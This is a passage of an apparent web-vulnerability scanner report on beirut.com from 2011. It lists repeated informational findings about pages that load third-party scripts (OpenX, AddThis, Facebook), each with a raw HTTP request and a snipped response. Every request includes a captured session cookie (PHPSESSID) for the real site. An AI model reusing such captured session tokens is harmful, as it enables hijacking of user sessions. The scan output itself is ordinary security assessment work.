User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:21:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.606. http://www.beirut.com/Online-Internet/Games-Entertainment/078114628 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Games-Entertainment/078114628

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Games-Entertainment/078114628 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:22:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.607. http://www.beirut.com/Online-Internet/Health-and-Wellbeing/6078086352 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Health-and-Wellbeing/6078086352

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Health-and-Wellbeing/6078086352 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:27:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.608. http://www.beirut.com/Online-Internet/Music/4018807677 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Music/4018807677

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Music/4018807677 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:29:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.609. http://www.beirut.com/Online-Internet/Nights-Food-and-Drink/902334694 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Nights-Food-and-Drink/902334694

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Nights-Food-and-Drink/902334694 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:29:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.610. http://www.beirut.com/Online-Internet/Personal-and-Opinion/3727967600 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Personal-and-Opinion/3727967600

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Personal-and-Opinion/3727967600 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:29:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.611. http://www.beirut.com/Online-Internet/Photography-and-Arts/3885810201 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Photography-and-Arts/3885810201

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Photography-and-Arts/3885810201 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:31:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.612. http://www.beirut.com/Online-Internet/Politics-Media-and-News/2845187560 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Politics-Media-and-News/2845187560

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Politics-Media-and-News/2845187560 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:35:22 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.613. http://www.beirut.com/Online-Internet/Real-Estate/5645685094 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Real-Estate/5645685094

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Real-Estate/5645685094 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:36:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.614. http://www.beirut.com/Online-Internet/Recreation/182769021 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Recreation/182769021

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Recreation/182769021 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:37:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.615. http://www.beirut.com/Online-Internet/Social-and-Activist/3727967600 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Social-and-Activist/3727967600

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Social-and-Activist/3727967600 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:37:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.616. http://www.beirut.com/Online-Internet/Technology/8023704728 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Technology/8023704728

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Technology/8023704728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:39:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.617. http://www.beirut.com/Online-Internet/Tourism-and-Guides/0054751592 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Tourism-and-Guides/0054751592

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Tourism-and-Guides/0054751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

